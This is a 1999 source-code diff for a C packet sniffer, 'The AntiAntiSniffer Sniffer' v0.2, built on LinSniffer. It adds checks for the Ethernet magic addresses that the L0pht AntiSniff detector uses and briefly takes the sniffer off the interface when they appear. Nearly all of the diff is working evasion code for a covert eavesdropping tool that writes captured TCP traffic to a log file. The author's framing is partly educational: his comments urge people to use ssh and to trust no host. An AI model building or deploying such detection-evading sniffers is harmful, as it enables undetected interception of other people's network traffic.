--- aass-old.c  Mon Jul 26 20:45:46 1999
+++ aass.c  Mon Jul 26 21:54:47 1999
@@ -1,5 +1,5 @@
 /*
-   The AntiAntiSniffer Sniffer by Mike Perry
+   The AntiAntiSniffer Sniffer v0.2 by Mike Perry

    To all my friends, coworkers, and associates who thought I knew better than
    to do something like this, please understand that when I discovered I could
@@ -8,9 +8,15 @@
    P.S. Legitimate tools such as icmplog will exhibit the same order of
    magnitude latency increase on ping responses.

+   New to 0.2: I check eth frame's addresses for the magic value used by l0pht
+   antisniff, as well as your ethaddr if ULTRA_PARANOID is set.
+
    Moral of the story: use ssh/lsh, and assume no host on your network is to
    be trusted under any means.
-
+
+   P.S. Sorry to all my teachers. All the global varables must be killing you
+   guys right now :)
+
    Based on:
    LinSniffer 0.03 [BETA]
    Mike Edulla
@@ -37,6 +43,10 @@

 #define INTERFACE "eth0"

+#ifndef ETH_ALEN
+# define ETH_ALEN   6
+#endif
+
 /* Really paranoid counts every packet in the load average. If the load
  * average jumps, we drop the promisc bit, and sleep for a few seconds */
 #define REALLY_PARANOID  3
@@ -61,8 +71,8 @@
  * accumulate enough packets for accurate statistics! See the HIDEOUT &
  * comments for more info..
  */
-#define NUM_PKTS_SHIFT 4
-#define NUM_PKTS 32
+#define NUM_PKTS_SHIFT 2
+#define NUM_PKTS 8

 /*
  * Secs to wait for the bad men to go away :)
@@ -83,19 +93,37 @@

 /* This causes the algorithm to treat dead time as if a packet was coming
  * every BASELINE usecs. Useful for intermittent traffic networks */
-#define BASELINE  5000 /* 5ms */
+#define BASELINE  4000 /* 4ms */

-/* As a last resort, don't track more than CMAX connections at once.
- */
+/* As a last resort, don't track more than CMAX connections at once. */
 #define CMAX  10 /* -1 is Inf */

+/* This option controls if we watch for the AntiSniff magic packets, in
+ * addition to our own address (in case they are sending the ping before we
+ * detected a change in load)
+ * Note, this is a definable option because it is possible to use this against
+ * us, and send these packets all the time just to shut us down */
+#define ANTIMAGIC
+
+#ifdef  ANTIMAGIC
+# define MAGIC1  "ff:00:00:00:00:00" /* Method #1 for Win* */
+# define MAGIC2  "66:66:66:66:66:66" /* AntiSniff user specified */
+# define MYADDR  "fe:ed:de:ad:be:ef" /* Undefine and decrement NMAGIC, and
+               change the hex_addrlist to not watch
+               for your address */
+# define NMAGIC    3      /* Number of magic eth addrs to search */
+char *hex_addrlist[] = { MAGIC1, MAGIC2, MYADDR };
+char h_dest[NMAGIC][ETH_ALEN];
+#endif
+
+
 #define CAPLEN 512
 #define TIMEOUT 30
 #define TCPLOG "test"

 /* Actually, this debug option prints out some pretty useful stats you can use
  * to set UMAX_LOAD */
-// #define DEBUG
+/*#define DEBUG */

 #ifdef DEBUG
 # define PRINTF(a...)  printf(##a)
@@ -145,7 +173,57 @@
 int s;
 FILE *fp;

+#ifdef ANTIMAGIC
+
+# ifdef DEBUG
+#  define PRINT_ETHER(a) print_ether(a)
+# else
+#  define PRINT_ETHER(a)
+# endif

+void print_ether(char *addr)
+{
+    fprintf(fp,"Eth addr %2X:%2X:%2X:%2X:%2X:%2X\n",
+      addr[0] & 0xff, addr[1] & 0xff,
+      addr[2] & 0xff, addr[3] & 0xff,
+      addr[4] & 0xff, addr[5] & 0xff);
+    fflush(fp);
+}
+
+void init_magic()
+{
+    char *p;
+    int j = 0, i;
+
+    for(j = 0; j < NMAGIC; j++)
+    {
+  p = hex_addrlist[j];
+  PRINTF("Blocking addr %s\n", p);
+  for(i=0; i < ETH_ALEN && p && *p != 0; i++, p++)
+  {
+      h_dest[j][i] = strtol(p, NULL, 16) & 0xff;
+      p = strchr(p, ':');
+  }
+  PRINT_ETHER(h_dest[j]);
+    }
+}
+
+int ismagic()
+{
+    register int i;
+
+    PRINT_ETHER(ep.eth.h_dest);
+
+    for(i = 0; i < NMAGIC; i++)
+    {
+  if(!memcmp(ep.eth.h_dest, h_dest[i], ETH_ALEN))
+  {
+      return 1;
+  }
+    }
+    return 0;
+}
+#endif
 void set_promisc(char *dev, int s)
 {
     struct ifreq ifr;
@@ -315,6 +393,14 @@
     {
   if(read(s, (struct etherpacket *) &ep, sizeof(ep)) > 1)
   {
+#ifdef ANTIMAGIC
+      if(ismagic())
+      {
+    closeintf(INTERFACE,s);
+    usleep(randhide());
+    openintf(INTERFACE);
+      }
+#endif
 #if AASS == REALLY_PARANOID
       if(account_load(&rawload))
       {
@@ -500,7 +586,6 @@
     signal(SIGKILL, cleanup);
     signal(SIGQUIT, cleanup);
     fp = fopen(TCPLOG, "at");
-    s = openintf(INTERFACE);
     gettimeofday(&tv, NULL);
     srand(tv.tv_usec ^ getpid() ^ (getppid() << 16));

@@ -516,8 +601,12 @@
     }

     vlist_head.next = NULL;
+#ifdef ANTIMAGIC
+    init_magic();
+#endif
     init_load(&tcpload);
     init_load(&rawload);
+    s = openintf(INTERFACE);
     for (;;)
     {
   read_tcp(s);